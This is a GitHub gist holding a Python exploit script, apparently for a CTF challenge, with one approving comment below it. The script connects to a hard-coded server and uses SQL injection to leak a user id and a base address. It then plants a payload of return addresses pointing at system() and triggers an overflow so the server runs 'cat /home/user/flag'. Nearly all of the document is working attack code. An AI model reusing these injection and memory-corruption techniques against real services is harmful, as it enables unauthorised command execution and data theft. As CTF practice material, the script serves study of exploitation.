Skip to content

Instantly share code, notes, and snippets.

@balidani
Created December 29, 2013 16:40
Show Gist options
  • Save balidani/0bb9f0927f751b630c67 to your computer and use it in GitHub Desktop.
Save balidani/0bb9f0927f751b630c67 to your computer and use it in GitHub Desktop.
import random
import socket
import string
import sys
import time
from binascii import hexlify
from binascii import unhexlify
def make_address(offset, address):
return unhexlify("%016x" % (offset + address))[::-1]
HOST = '88.198.89.199'
PORT = 1234
system_address = -0xebace0
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(2)
s.recv(1024)
# Generate user
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])
# Register
s.sendall("register %s %s\n" % (username, username))
s.recv(1024)
# Login
s.sendall("login %s %s\n" % (username, username))
s.recv(1024)
# Leak userid
s.sendall("search x' union select id from users where name='%s'#\n" % (username))
s.recv(1024)
s.sendall("show 0\n")
userid = int(s.recv(1024)[3:])
# print "Userid: %d" % userid
# Leak base address
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
s.recv(1024)
s.sendall("show 11\n")
s.recv(4)
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
# print "Base address: 0x%x" % offset
s.recv(1024)
# Add dummy value and payload
payload = '\x00' * 56 + '\x02' + '\x00' * 7
payload += make_address(offset, 0x223d)
payload += make_address(offset, 0x2238)
payload += make_address(offset, system_address)
payload += make_address(offset, 0x223d)
payload = hexlify(payload)
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
s.recv(1024)
# Overflow payload to 0x203d68
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
s.recv(1024)
# Test
s.sendall("add cat /home/user/flag\n")
print s.recv(1024)
@hellman
Copy link

hellman commented Jan 1, 2014

nice exploit!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment